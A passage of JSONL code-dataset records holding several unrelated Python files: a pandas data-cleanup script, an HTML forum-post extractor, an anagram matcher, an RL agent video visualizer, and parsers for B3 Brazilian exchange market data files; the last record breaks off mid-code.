from a cell to a different char\n\n def FixCells(ColumnName, OldCharacter, NewCharacter):\n df[ColumnName] = df[ColumnName].str.replace(OldCharacter,NewCharacter)\n\n#Change a cell that contains dual data to a data that comes after a delimeter\n\n def CleanDualData(ColumnName, Delimiter):\n df[ColumnName] = df[ColumnName].str.split(Delimiter).str[0]\n \n #Add Data After delimiter to a second column\n \n def AddDualDataToColumn(ColumnName, Delimiter):\n df[ColumnName + \"_Second\"] = df[ColumnName].str.split(Delimiter).str[1]\n \n def EliminateBadData(ColumnName, CharNo):\n for i in range(497):\n if(len(df.at[i,ColumnName]) != CharNo):\n df.at[i,ColumnName] = \"\"\n \n def EliminateStringFromInt(ColumnName):\n df['columnName'] = df['columnName'].astype('str').str.extractall('(\\d+)').unstack().fillna('').sum(axis=1).astype(int)\n\n\nFixCells('Phone_Number','09', '9')\nFixCells('Phone_Number', '011', '11')\nCleanDualData('Phone_Number', '/')\n\nprint(df)\n\n\n\n\n\n","repo_name":"ahmedabdurahim/Data-Cleanup-Python","sub_path":"DataCleanUp.py","file_name":"DataCleanUp.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9937065198","text":"from bs4 import BeautifulSoup\nfrom bs4.element import Tag\nfrom tqdm import tqdm as tqdm\nfrom typing import List\nimport json\nimport glob\nimport re\n\nclass HTMLExtractor(object):\n\n def __init__(self, html_str: str) -> None:\n \n self.soup = BeautifulSoup(html_str, 'lxml')\n \n def select_by_class(self, html_element=\"div\", \n html_class=\"bbWrapper\"):\n return self.soup.find_all(html_element, {\"class\": html_class})\n\n def strip_tag_from_html_string(self, html_str: str, html_tag: str) -> str:\n '''\n Sample input:

    I\\'m in the same spot as you. LPN, needing to work from home

    \n Sample output:

    I\\'m in the same spot as you, needing to work from home

    \n '''\n regex = \"<{}(.|\\n)*?\".format(html_tag, html_tag)\n return re.sub(regex, \"\", str(html_str))\n\n def exclude_tags_by_class(self, tags: List[Tag], _class='ipsItemControls'):\n '''exclude tags with a given class from a list of bs4 tags'''\n return [o for o in tags if _class not in o.attrs[\"class\"]]\n\n def extract(self, html_element=\"div\", html_class=\"message-userContent\"):\n\n items = self.select_by_class(html_element, html_class)\n\n output = []\n \n for i, item in enumerate(items):\n tags = [c for c in item.children if type(c) == Tag]\n tags = self.exclude_tags_by_class(tags, _class='ipsItemControls')\n for c in tags:\n item = self.strip_tag_from_html_string(str(c), \"abbr\")\n item = BeautifulSoup(item, 'lxml')\n item = item.text\n item = item.replace(\"\\n\", \" \").strip()\n output.append(item)\n\n return output\n\n\nif __name__ == \"__main__\":\n with open(\"index.html\", \"r\") as inf:\n html_doc = inf.read()\n extractor = HTMLExtractor(html_doc)\n messages = extractor.extract(html_element=\"div\", html_class=\"cPost_contentWrap\")\n for i, message in enumerate(messages):\n print(i, message)\n","repo_name":"AbeHandler/scratch","sub_path":"proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22180575991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 12:02:17 2020\n\n@author: grego\n\"\"\"\n\ndef convertSpecialChars(word):\n replace_strings = {'0' : 'null',\n '11': 'elf',\n '1' : 'eins',\n '2' : 'zwei',\n '3' : 'drei',\n '4' : 'vier',\n '5' : 'fuenf',\n '6' : 'sechs',\n '7' : 'sieben',\n '8' : 'acht',\n '9' : 'neun',\n 'ä' : 'ae',\n 'ö' : 'oe',\n 'ü' : 'ue',\n 'ß' : 'ss',\n ' ' : '',\n '\\n' : '',\n '\\t' : '',\n '_' : '',\n '.' : '',\n '-' : '',\n \"'\" : '',\n '+' : '',\n '&' : ''}\n \n word = word.lower()\n \n for k in replace_strings:\n word = word.replace(k, replace_strings[k])\n \n return word\n\n\nwith open('input_tomatch2.txt', 'r', encoding=\"utf-8\") as f:\n lines_tomatch = f.readlines()\n \nwith open('input_dict.txt', 'r', encoding=\"utf-8\") as f:\n lines_dict = f.readlines() \n \nlines_tomatch = [s.replace('\\n', '').replace('\\t', '') for s in lines_tomatch]\nlines_dict = [s.replace('\\n', '').replace('\\t', '') for s in lines_dict]\nlines_dict = list(set(lines_dict)) # remove duplicates \n\nlines_tomatch_mod = [convertSpecialChars(s) for s in lines_tomatch]\nlines_dict_mod = [convertSpecialChars(s) for s in lines_dict]\n\nfor idxToMatch, wordToMatch in enumerate(lines_tomatch_mod):\n matchFound = False\n \n for idxDict, wordDictMod in enumerate(lines_dict_mod):\n if sorted(wordToMatch) == sorted(wordDictMod):\n #if (all(x in wordToMatch for x in wordDictMod)):\n print(f'[MATCH] {lines_tomatch[idxToMatch]} -> {wordToMatch} -> {wordDictMod} -> {lines_dict[idxDict]}')\n matchFound = True\n break\n \n \n if not matchFound:\n print(f'[ERROR] {lines_tomatch[idxToMatch]} -> No match found')","repo_name":"noxthot/geocaching_mystery_snippets","sub_path":"anagram_matcher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21488958077","text":"import cv2\r\nimport json\r\nimport click\r\nimport os\r\nimport importlib\r\nfrom tensorboard.backend.event_processing import event_accumulator\r\nimport torch\r\nimport numpy as np\r\nfrom unstable_baselines.common.env_wrapper import get_env\r\nfrom unstable_baselines.common.util import load_config, set_device_and_logger\r\nfrom tqdm import tqdm\r\nfrom operator import itemgetter\r\nfrom unstable_baselines.common import util\r\n\r\nAGENT_MODULE_MAPPING={\r\n \"sac\":\"unstable_baselines.baselines.sac.agent\",\r\n \"ddpg\":\"unstable_baselines.baselines.ddpg.agent\",\r\n \"dqn\":\"unstable_baselines.baselines.dqn.agent\",\r\n \"ppo\":\"unstable_baselines.baselines.ppo.agent\",\r\n \"redq\":\"unstable_baselines.baselines.redq.agent\",\r\n \"td3\":\"unstable_baselines.baselines.td3.agent\",\r\n \"vpg\":\"unstable_baselines.baselines.vpg.agent\",\r\n \"mbpo\":\"unstable_baselines.model_based_rl.mbpo.agent\",\r\n \"pearl\": \"unstable_baselines.meta_rl.pearl.agent\"\r\n}\r\n\r\ndef load_params(log_dir):\r\n config_path = os.path.join(log_dir, 'parameters.txt')\r\n with open(config_path, 'r') as f:\r\n params = json.load(f)\r\n return params\r\n \r\ndef rollout(agent, env, width, height, max_trajectory_length, ret_imgs, **args):\r\n\r\n imgs = []\r\n traj_ret = 0\r\n obs = env.reset()\r\n if ret_imgs:\r\n img = env.render(mode='rgb_array', width=width, height=height)\r\n imgs.append(img)\r\n for step in range(max_trajectory_length):\r\n #obs = torch.FloatTensor(obs).to(util.device)\r\n action = agent.select_action(obs)['action']\r\n next_obs, reward, done, _ = env.step(action)\r\n traj_ret += reward\r\n obs = next_obs\r\n if ret_imgs:\r\n img = env.render(mode='rgb_array', width=width, height=height)\r\n imgs.append(img)\r\n if done:\r\n break\r\n return {\r\n \"ret\": traj_ret,\r\n \"imgs\": imgs if ret_imgs else None\r\n }\r\n \r\n\r\ndef select_best_snapshot(agent, env, snapshot_dirs, config):\r\n best_snapshot_dir = \"\"\r\n best_ret = -np.inf\r\n for snapshot_dir in tqdm(snapshot_dirs):\r\n for network_name, net in agent.networks.items():\r\n load_path = os.path.join(snapshot_dir, network_name + \".pt\")\r\n agent.__dict__[network_name] = torch.load(load_path, map_location=util.device)\r\n rets = []\r\n for trial in range(config['num_trials']):\r\n traj_ret = rollout(agent, env, ret_imgs=False, **config)['ret']\r\n rets.append(traj_ret)\r\n ret_mean = np.mean(rets)\r\n if ret_mean > best_ret:\r\n best_snapshot_dir = snapshot_dir\r\n best_ret = ret_mean\r\n return best_ret, best_snapshot_dir\r\n\r\n\r\ndef load_snapshot(agent, env, log_dir, config):\r\n #get model path\r\n snapshot_dir = os.path.join(log_dir, \"models\")\r\n snapshot_dirs = [d for d in os.listdir(snapshot_dir) if \"ite_\" in d]\r\n snapshot_relative_dirs = [os.path.join(snapshot_dir, d) for d in snapshot_dirs]\r\n snapshot_timestamps = [int(d[4:]) for d in snapshot_dirs]\r\n snapshot_timestamps = sorted(snapshot_timestamps)\r\n if config['mode'] == 'last':\r\n selected_timestamp = snapshot_timestamps[-1]\r\n elif config['mode'] == 'best':\r\n best_ret, selected_dir = select_best_snapshot(agent, env, snapshot_relative_dirs, config)\r\n selected_timestamp = int(selected_dir.split(os.sep)[-1][4:])\r\n\r\n selected_snapshot_dir = os.path.join(snapshot_dir, \"ite_\"+str(selected_timestamp))\r\n for network_name, net in agent.networks.items():\r\n load_path = os.path.join(selected_snapshot_dir, network_name + \".pt\")\r\n agent.__dict__[network_name] = torch.load(load_path ,map_location=util.device)\r\n\r\n@click.command(context_settings=dict(\r\n ignore_unknown_options=True,\r\n allow_extra_args=True,)\r\n)\r\n@click.argument(\"algo_name\", type=str) # Name of the algorithm, should be in the AGENT_MODULE_MAPPING global variable\r\n@click.argument(\"log_dir\", type=str) # Path of the log directory\r\n@click.argument(\"config-path\", type=str) # Config path\r\n@click.option(\"--gpu\", type=int, default=-1) # Device to load agent, -1 for cpu, >=0 for CUDA gpu\r\n@click.argument('args', nargs=-1)\r\ndef main(algo_name, log_dir, config_path, gpu, args):\r\n #set device\r\n set_device_and_logger(gpu, None)\r\n\r\n #load config and parameters\r\n params = load_params(log_dir)\r\n config = load_config(config_path, args)\r\n\r\n #load env\r\n env_name = params['env_name']\r\n env = get_env(env_name)\r\n obs_space = env.observation_space\r\n action_space = env.action_space\r\n\r\n #load agent\r\n agent_name = algo_name.upper() + \"Agent\"\r\n agent_module = importlib.import_module(AGENT_MODULE_MAPPING[algo_name],package=algo_name+\".agent\")\r\n agent_class = getattr(agent_module, agent_name)\r\n agent = agent_class(obs_space, action_space, **params['agent'])\r\n \r\n #load model\r\n load_snapshot(agent, env, log_dir, config)\r\n\r\n #save video demo\r\n\r\n #select the best traj from trials\r\n traj_imgs = []\r\n num_trials = config['num_trials']\r\n best_ret = -10000000000\r\n for trial in range(num_trials):\r\n imgs, traj_ret = itemgetter(\"imgs\",\"ret\")(rollout(agent, env, ret_imgs=True, **config))\r\n if traj_ret > best_ret:\r\n traj_imgs = imgs\r\n best_ret = traj_ret\r\n \r\n # write imgs to video\r\n output_dir = config['output_dir']\r\n output_path = os.path.join(output_dir, \"{}_{}_{}.mp4\".format(algo_name, env_name, int(best_ret)))\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n video_size = (config['width'], config['height'])\r\n fps = config['fps']\r\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\r\n video_writer = cv2.VideoWriter(output_path, fourcc, fps, video_size)\r\n for img in traj_imgs:\r\n video_writer.write(img)\r\n video_writer.release()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"x35f/unstable_baselines","sub_path":"tools/visualizer/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"31"} +{"seq_id":"44851737190","text":"\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nF = \"BJ721E05W-J11@9=person_whole_front_depth\"\n\ndata = np.load(f\"data/depth/{F}.npy\")\nplt.imshow(data)\nplt.colorbar()\nfig = plt.gcf()\nHEIGHT, WIDTH = 512, 320\nfig.set_size_inches(WIDTH/50, HEIGHT/50)\nplt.savefig(f\"data/depth/demo-{F}.png\")\n","repo_name":"aspfohl/deeep-learning","sub_path":"data/depth/viz_depth.py","file_name":"viz_depth.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32912799050","text":"\nimport json\nfrom itertools import groupby\n\nimport pandas as pd\nfrom lxml import etree\n\nfrom . import PortugueseRulesParser2, read_fwf, FWFFile, FWFRow, Field, DateField, NumericField\n\nclass TaxaSwap:\n widths = [6, 3, 2, 8, 2, 5, 15, 5, 5, 1, 14, 1, 5]\n colnames = [\n 'id_transacao',\n 'compl_transacao',\n 'tipo_registro',\n 'data_geracao_arquivo',\n 'cod_curvas',\n 'cod_taxa',\n 'desc_taxa',\n 'num_dias_corridos',\n 'num_dias_saques',\n 'sinal_taxa',\n 'taxa_teorica',\n 'carat_vertice',\n 'cod_vertice'\n ]\n\n def __init__(self, fname):\n with open(fname, 'r') as fp:\n rawdata = fp.read()\n self.__data = read_fwf(rawdata.split('\\n'), self.widths, self.colnames, parse_fun=self._parse)\n self.__findata = [self._build_findata(list(v)) for k, v in groupby(self.__data, key=lambda x: x['cod_taxa'])]\n \n def _parse(self, obj):\n obj['data_geracao_arquivo'] = '{}-{}-{}'.format(obj['data_geracao_arquivo'][:4], obj['data_geracao_arquivo'][4:6], obj['data_geracao_arquivo'][6:])\n obj['num_dias_corridos'] = int(obj['num_dias_corridos'])\n obj['num_dias_saques'] = int(obj['num_dias_saques'])\n obj['sinal_taxa'] = 1 if obj['sinal_taxa'] == '+' else -1\n obj['taxa_teorica'] = float(obj['taxa_teorica'])/1e7\n return obj\n\n def _build_findata(self, lst):\n taxa_teorica = [obj['taxa_teorica']*obj['sinal_taxa'] for obj in lst]\n num_dias_corridos = [obj['num_dias_corridos'] for obj in lst]\n num_dias_saques = [obj['num_dias_saques'] for obj in lst]\n carat_vertice = [obj['carat_vertice'] for obj in lst]\n keys = ('current_days', 'business_days', 'type', 'value')\n terms = [dict(zip(keys, x)) for x in zip(num_dias_corridos, num_dias_saques, carat_vertice, taxa_teorica)]\n\n return {\n 'refdate': lst[0]['data_geracao_arquivo'],\n 'id': lst[0]['cod_taxa'],\n 'name': lst[0]['cod_curvas'],\n 'description': lst[0]['desc_taxa'],\n 'terms': terms\n }\n\n @property\n def data(self):\n return self.__data\n\n @property\n def findata(self):\n return self.__findata\n\n\nclass CDIIDI:\n def __init__(self, fname):\n self.fname = fname\n self.parse()\n\n def parse(self):\n text_parser = PortugueseRulesParser2()\n with open(self.fname, 'r') as fp:\n _data = json.loads(fp.read())\n cdi_data = {\n 'refdate': text_parser.parse(_data['dataTaxa']),\n 'value': text_parser.parse(_data['taxa']),\n 'symbol': 'CDI'\n }\n idi_data = {\n 'refdate': text_parser.parse(_data['dataIndice']),\n 'value': text_parser.parse(_data['indice']),\n 'symbol': 'IDI'\n }\n self._info = [cdi_data, idi_data]\n self._data = pd.DataFrame(self._info)\n\n @property\n def data(self):\n return self._data\n\n\nclass BVBG028:\n ATTRS = {\n 'header': {\n 'trade_date': 'RptParams/RptDtAndTm/Dt',\n 'security_id': 'FinInstrmId/OthrId/Id',\n 'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'FinInstrmId/OthrId/PlcOfListg/MktIdrCd',\n 'instrument_asset': 'FinInstrmAttrCmon/Asst',\n 'instrument_asset_description': 'FinInstrmAttrCmon/AsstDesc',\n 'instrument_market': 'FinInstrmAttrCmon/Mkt',\n 'instrument_segment': 'FinInstrmAttrCmon/Sgmt',\n 'instrument_description': 'FinInstrmAttrCmon/Desc'\n },\n 'EqtyInf': {\n 'security_category': 'InstrmInf/EqtyInf/SctyCtgy',\n 'isin': 'InstrmInf/EqtyInf/ISIN',\n 'distribution_id': 'InstrmInf/EqtyInf/DstrbtnId',\n 'cfi_code': 'InstrmInf/EqtyInf/CFICd',\n 'specification_code': 'InstrmInf/EqtyInf/SpcfctnCd',\n 'corporation_name': 'InstrmInf/EqtyInf/CrpnNm',\n 'symbol': 'InstrmInf/EqtyInf/TckrSymb',\n 'payment_type': 'InstrmInf/EqtyInf/PmtTp',\n 'allocation_lot_size': 'InstrmInf/EqtyInf/AllcnRndLot',\n 'price_factor': 'InstrmInf/EqtyInf/PricFctr',\n 'trading_start_date': 'InstrmInf/EqtyInf/TradgStartDt',\n 'trading_end_date': 'InstrmInf/EqtyInf/TradgEndDt',\n 'corporate_action_start_date': 'InstrmInf/EqtyInf/CorpActnStartDt',\n 'ex_distribution_number': 'InstrmInf/EqtyInf/EXDstrbtnNb',\n 'custody_treatment_type': 'InstrmInf/EqtyInf/CtdyTrtmntTp',\n 'trading_currency': 'InstrmInf/EqtyInf/TradgCcy',\n 'market_capitalisation': 'InstrmInf/EqtyInf/MktCptlstn',\n 'last_price': 'InstrmInf/EqtyInf/LastPric',\n 'first_price': 'InstrmInf/EqtyInf/FrstPric',\n 'governance_indicator': 'InstrmInf/EqtyInf/GovnInd',\n 'days_to_settlement': 'InstrmInf/EqtyInf/DaysToSttlm',\n 'right_issue_price': 'InstrmInf/EqtyInf/RghtsIssePric',\n },\n 'OptnOnEqtsInf': {\n 'security_category': 'InstrmInf/OptnOnEqtsInf/SctyCtgy',\n 'isin': 'InstrmInf/OptnOnEqtsInf/ISIN',\n 'symbol': 'InstrmInf/OptnOnEqtsInf/TckrSymb',\n 'exercise_price': 'InstrmInf/OptnOnEqtsInf/ExrcPric',\n 'option_style': 'InstrmInf/OptnOnEqtsInf/OptnStyle',\n 'expiration_date': 'InstrmInf/OptnOnEqtsInf/XprtnDt',\n 'option_type': 'InstrmInf/OptnOnEqtsInf/OptnTp',\n 'underlying_security_id': 'InstrmInf/OptnOnEqtsInf/UndrlygInstrmId/OthrId/Id',\n 'underlying_security_proprietary': 'InstrmInf/OptnOnEqtsInf/UndrlygInstrmId/OthrId/Tp/Prtry',\n 'underlying_security_market': 'InstrmInf/OptnOnEqtsInf/UndrlygInstrmId/OthrId/PlcOfListg/MktIdrCd',\n 'protection_flag': 'InstrmInf/OptnOnEqtsInf/PrtcnFlg',\n 'premium_upfront_indicator': 'InstrmInf/OptnOnEqtsInf/PrmUpfrntInd',\n 'trading_start_date': 'InstrmInf/OptnOnEqtsInf/TradgStartDt',\n 'trading_end_date': 'InstrmInf/OptnOnEqtsInf/TradgEndDt',\n 'payment_type': 'InstrmInf/OptnOnEqtsInf/PmtTp',\n 'allocation_lot_size': 'InstrmInf/OptnOnEqtsInf/AllcnRndLot',\n 'price_factor': 'InstrmInf/OptnOnEqtsInf/PricFctr',\n 'trading_currency': 'InstrmInf/OptnOnEqtsInf/TradgCcy',\n 'days_to_settlement': 'InstrmInf/OptnOnEqtsInf/DaysToSttlm',\n 'delivery_type': 'InstrmInf/OptnOnEqtsInf/DlvryTp',\n 'automatic_exercise_indicator': 'InstrmInf/OptnOnEqtsInf/AutomtcExrcInd',\n },\n 'FutrCtrctsInf': {\n 'security_category': 'InstrmInf/FutrCtrctsInf/SctyCtgy',\n 'expiration_date': 'InstrmInf/FutrCtrctsInf/XprtnDt',\n 'symbol': 'InstrmInf/FutrCtrctsInf/TckrSymb',\n 'expiration_code': 'InstrmInf/FutrCtrctsInf/XprtnCd',\n 'trading_start_date': 'InstrmInf/FutrCtrctsInf/TradgStartDt',\n 'trading_end_date': 'InstrmInf/FutrCtrctsInf/TradgEndDt',\n 'value_type_code': 'InstrmInf/FutrCtrctsInf/ValTpCd',\n 'isin': 'InstrmInf/FutrCtrctsInf/ISIN',\n 'cfi_code': 'InstrmInf/FutrCtrctsInf/CFICd',\n 'delivery_type': 'InstrmInf/FutrCtrctsInf/DlvryTp',\n 'payment_type': 'InstrmInf/FutrCtrctsInf/PmtTp',\n 'contract_multiplier': 'InstrmInf/FutrCtrctsInf/CtrctMltplr',\n 'asset_settlement_indicator': 'InstrmInf/FutrCtrctsInf/AsstQtnQty',\n 'allocation_lot_size': 'InstrmInf/FutrCtrctsInf/AllcnRndLot',\n 'trading_currency': 'InstrmInf/FutrCtrctsInf/TradgCcy',\n 'underlying_security_id': 'InstrmInf/FutrCtrctsInf/UndrlygInstrmId/OthrId/Id',\n 'underlying_security_proprietary': 'InstrmInf/FutrCtrctsInf/UndrlygInstrmId/OthrId/Tp/Prtry',\n 'underlying_security_market': 'InstrmInf/FutrCtrctsInf/UndrlygInstrmId/OthrId/PlcOfListg/MktIdrCd',\n 'withdrawal_days': 'InstrmInf/FutrCtrctsInf/WdrwlDays',\n 'working_days': 'InstrmInf/FutrCtrctsInf/WrkgDays',\n 'calendar_days': 'InstrmInf/FutrCtrctsInf/ClnrDays',\n }\n }\n\n def __init__(self, fname):\n self.fname = fname\n self.instruments = []\n self.missing = set()\n self.parse()\n\n def parse(self):\n with open(self.fname, 'rb') as fp:\n tree = etree.parse(fp)\n exchange = tree.getroot()[0][0]\n ns = {None: 'urn:bvmf.052.01.xsd'}\n td_xpath = etree.ETXPath('//{urn:bvmf.052.01.xsd}BizGrpDtls')\n td = td_xpath(exchange)\n if len(td) > 0:\n self.creation_date = td[0].find('CreDtAndTm', ns).text[:10]\n else:\n raise Exception('Invalid XML: tag BizGrpDtls not found')\n\n xs = exchange.findall(\n '{urn:bvmf.052.01.xsd}BizGrp/{urn:bvmf.100.02.xsd}Document/{urn:bvmf.100.02.xsd}Instrm')\n for node in xs:\n self.parse_instrument_node(node)\n\n def parse_instrument_node(self, node):\n data = {'creation_date': self.creation_date}\n ns = {None: 'urn:bvmf.100.02.xsd'}\n for attr in self.ATTRS['header']:\n els = node.findall(self.ATTRS['header'][attr], ns)\n if len(els):\n data[attr] = els[0].text.strip()\n elm = node.findall('InstrmInf', ns)[0]\n # remove ns {urn:bvmf.100.02.xsd} = 21 chars\n tag = elm.getchildren()[0].tag[21:]\n if self.ATTRS.get(tag) is None:\n self.missing.add(tag)\n return\n for attr in self.ATTRS[tag]:\n els = node.findall(self.ATTRS[tag][attr], ns)\n if len(els):\n data[attr] = els[0].text.strip()\n data['instrument_type'] = tag\n self.instruments.append(data)\n\n @property\n def data(self):\n return self.instruments\n\n\nclass BVBG086:\n def __init__(self, fname):\n self.fname = fname\n self.instruments = []\n self.missing = set()\n self.parse()\n\n def parse(self):\n with open(self.fname, 'rb') as fp:\n tree = etree.parse(fp)\n exchange = tree.getroot()[0][0]\n ns = {None: 'urn:bvmf.052.01.xsd'}\n td_xpath = etree.ETXPath('//{urn:bvmf.052.01.xsd}BizGrpDtls')\n td = td_xpath(exchange)\n if len(td) > 0:\n self.creation_date = td[0].find('CreDtAndTm', ns).text[:10]\n else:\n raise Exception('Invalid XML: tag BizGrpDtls not found')\n\n xs = exchange.findall(\n '{urn:bvmf.052.01.xsd}BizGrp/{urn:bvmf.217.01.xsd}Document/{urn:bvmf.217.01.xsd}PricRpt')\n for node in xs:\n self.parse_price_report_node(node)\n\n def parse_price_report_node(self, node):\n attrs = {\n 'trade_date': 'TradDt/Dt',\n 'symbol': 'SctyId/TckrSymb',\n 'security_id': 'FinInstrmId/OthrId/Id', # SecurityId\n 'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'FinInstrmId/PlcOfListg/MktIdrCd',\n 'trade_quantity': 'TradDtls/TradQty', # Negócios\n 'volume': 'FinInstrmAttrbts/NtlFinVol',\n 'open_interest': 'FinInstrmAttrbts/OpnIntrst',\n 'traded_contracts': 'FinInstrmAttrbts/FinInstrmQty',\n 'best_ask_price': 'FinInstrmAttrbts/BestAskPric',\n 'best_bid_price': 'FinInstrmAttrbts/BestBidPric',\n 'first_price': 'FinInstrmAttrbts/FrstPric',\n 'min_price': 'FinInstrmAttrbts/MinPric',\n 'max_price': 'FinInstrmAttrbts/MaxPric',\n 'average_price': 'FinInstrmAttrbts/TradAvrgPric',\n 'last_price': 'FinInstrmAttrbts/LastPric',\n # Negócios na sessão regular\n 'regular_transactions_quantity': 'FinInstrmAttrbts/RglrTxsQty',\n # Contratos na sessão regular\n 'regular_traded_contracts': 'FinInstrmAttrbts/RglrTraddCtrcts',\n # Volume financeiro na sessão regular\n 'regular_volume': 'FinInstrmAttrbts/NtlRglrVol',\n # Negócios na sessão não regular\n 'nonregular_transactions_quantity': 'FinInstrmAttrbts/NonRglrTxsQty',\n # Contratos na sessão não regular\n 'nonregular_traded_contracts': 'FinInstrmAttrbts/NonRglrTraddCtrcts',\n # Volume financeiro na sessão nãoregular\n 'nonregular_volume': 'FinInstrmAttrbts/NtlNonRglrVol',\n 'oscillation_percentage': 'FinInstrmAttrbts/OscnPctg',\n 'adjusted_quote': 'FinInstrmAttrbts/AdjstdQt',\n 'adjusted_tax': 'FinInstrmAttrbts/AdjstdQtTax',\n 'previous_adjusted_quote': 'FinInstrmAttrbts/PrvsAdjstdQt',\n 'previous_adjusted_tax': 'FinInstrmAttrbts/PrvsAdjstdQtTax',\n 'variation_points': 'FinInstrmAttrbts/VartnPts',\n 'adjusted_value_contract': 'FinInstrmAttrbts/AdjstdValCtrct',\n }\n ns = {None: 'urn:bvmf.217.01.xsd'}\n data = {'creation_date': self.creation_date}\n for attr in attrs:\n els = node.findall(attrs[attr], ns)\n if len(els):\n data[attr] = els[0].text\n self.instruments.append(data)\n\n @property\n def data(self):\n return self.instruments\n\n\nclass COTAHIST_header(FWFRow):\n _pattern = r'^00'\n tipo_registro = Field(2)\n nome_arquivo = Field(13)\n cod_origem = Field(8)\n data_geracao_arquivo = DateField(8, '%Y%m%d')\n reserva = Field(214)\n\n\nclass COTAHIST_trailer(FWFRow):\n _pattern = r'^99'\n tipo_mercado = Field(2)\n nome_arquivo = Field(13)\n cod_origem = Field(8)\n data_geracao_arquivo = DateField(8, '%Y%m%d')\n num_registros = Field(11)\n reserva = Field(203)\n\n\nclass COTAHIST_histdata(FWFRow):\n _pattern = '^01'\n tipo_registro = Field(2)\n data_referencia = DateField(8, '%Y%m%d')\n cod_bdi = Field(2)\n cod_negociacao = Field(12)\n tipo_mercado = Field(3)\n nome_empresa = Field(12)\n especificacao = Field(10)\n num_dias_mercado_termo = Field(3)\n cod_moeda = Field(4)\n preco_abertura = NumericField(13, dec=2)\n preco_max = NumericField(13, dec=2)\n preco_min = NumericField(13, dec=2)\n preco_med = NumericField(13, dec=2)\n preco_ult = NumericField(13, dec=2)\n preco_melhor_oferta_compra = NumericField(13, dec=2)\n preco_melhor_oferta_venda = NumericField(13, dec=2)\n qtd_negocios = NumericField(5)\n qtd_titulos_negociados = NumericField(18)\n volume_titulos_negociados = NumericField(18, dec=2)\n preco_exercicio = NumericField(13, dec=2)\n indicador_correcao_preco_exercicio = Field(1)\n data_vencimento = DateField(8, '%Y%m%d')\n fator_cot = NumericField(7, dec=2)\n preco_exercicio_pontos = NumericField(13, dec=6)\n cod_isin = Field(12)\n num_dist = Field(3)\n\n\nclass COTAHIST_file(FWFFile):\n header = COTAHIST_header()\n trailer = COTAHIST_trailer()\n data = COTAHIST_histdata()\n\n\nclass COTAHIST:\n def __init__(self, fname):\n self.fname = fname\n self._data = None\n self.parse()\n\n def parse(self):\n self._data = COTAHIST_file(self.fname, encoding='latin1')\n\n @property\n def data(self):\n return self._data.data\n\n @property\n def header(self):\n return self._data.header\n\n @property\n def trailer(self):\n return self._data.trailer\n\n\ndef smart_find(node, x, ns):\n try:\n return node.find(x, ns).text\n except:\n return None\n\n\nclass BVBG087:\n ATTRS = {\n 'IndxInf': {\n 'ticker_symbol': 'SctyInf/SctyId/TckrSymb',\n 'security_id': 'SctyInf/FinInstrmId/OthrId/Id',\n 'security_proprietary': 'SctyInf/FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'SctyInf/FinInstrmId/PlcOfListg/MktIdrCd',\n 'asset_desc': 'AsstDesc',\n 'settlement_price': 'SttlmVal',\n 'open_price': 'SctyInf/OpngPric',\n 'min_price': 'SctyInf/MinPric',\n 'max_price': 'SctyInf/MaxPric',\n 'average_price': 'SctyInf/TradAvrgPric',\n 'close_price': 'SctyInf/ClsgPric',\n 'last_price': 'SctyInf/IndxVal',\n 'oscillation_val': 'SctyInf/OscnVal',\n 'rising_shares_number': 'RsngShrsNb',\n 'falling_shares_number': 'FlngShrsNb',\n 'stable_shares_number': 'StblShrsNb'\n },\n 'IOPVInf': {\n 'ticker_symbol': 'SctyId/TckrSymb',\n 'security_id': 'FinInstrmId/OthrId/Id',\n 'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'FinInstrmId/PlcOfListg/MktIdrCd',\n 'open_price': 'OpngPric',\n 'min_price': 'MinPric',\n 'max_price': 'MaxPric',\n 'average_price': 'TradAvrgPric',\n 'close_price': 'ClsgPric',\n 'last_price': 'IndxVal',\n 'oscillation_val': 'OscnVal',\n },\n 'BDRInf': {\n 'ticker_symbol': 'SctyId/TckrSymb',\n 'security_id': 'FinInstrmId/OthrId/Id',\n 'security_proprietary': 'FinInstrmId/OthrId/Tp/Prtry',\n 'security_market': 'FinInstrmId/PlcOfListg/MktIdrCd',\n 'ref_price': 'RefPric',\n }\n }\n\n def __init__(self, fname):\n self.fname = fname\n self.indexes = []\n self.parse()\n\n def parse(self):\n with open(self.fname, 'rb') as fp:\n tree = etree.parse(fp)\n\n ns = {None: 'urn:bvmf.218.01.xsd'}\n exchange = tree.getroot()[0][0]\n\n td_xpath = etree.ETXPath('//{urn:bvmf.218.01.xsd}TradDt')\n td = td_xpath(exchange)\n if len(td) > 0:\n trade_date = td[0].find('Dt', ns).text\n else:\n raise Exception('Invalid XML: tag TradDt not found')\n\n for tag in self.ATTRS:\n fields = self.ATTRS[tag]\n _xpath = etree.ETXPath('//{urn:bvmf.218.01.xsd}%s' % tag)\n for node in _xpath(exchange):\n data = {\n 'trade_date': trade_date,\n 'index_type': tag\n }\n for k in fields:\n data[k] = smart_find(node, fields[k], ns)\n self.indexes.append(data)\n\n @property\n def data(self):\n return self.indexes\n\n\nclass StockIndexInfo:\n def __init__(self, fname):\n self.fname = fname\n self._table = None\n self.parse()\n\n def parse(self):\n with open(self.fname) as fp:\n self._data = json.loads(fp.read())\n\n df = pd.DataFrame(self._data['results'])\n\n def _(dfx):\n indexes = dfx['indexes'].str.split(',').explode()\n return pd.DataFrame({\n 'company': 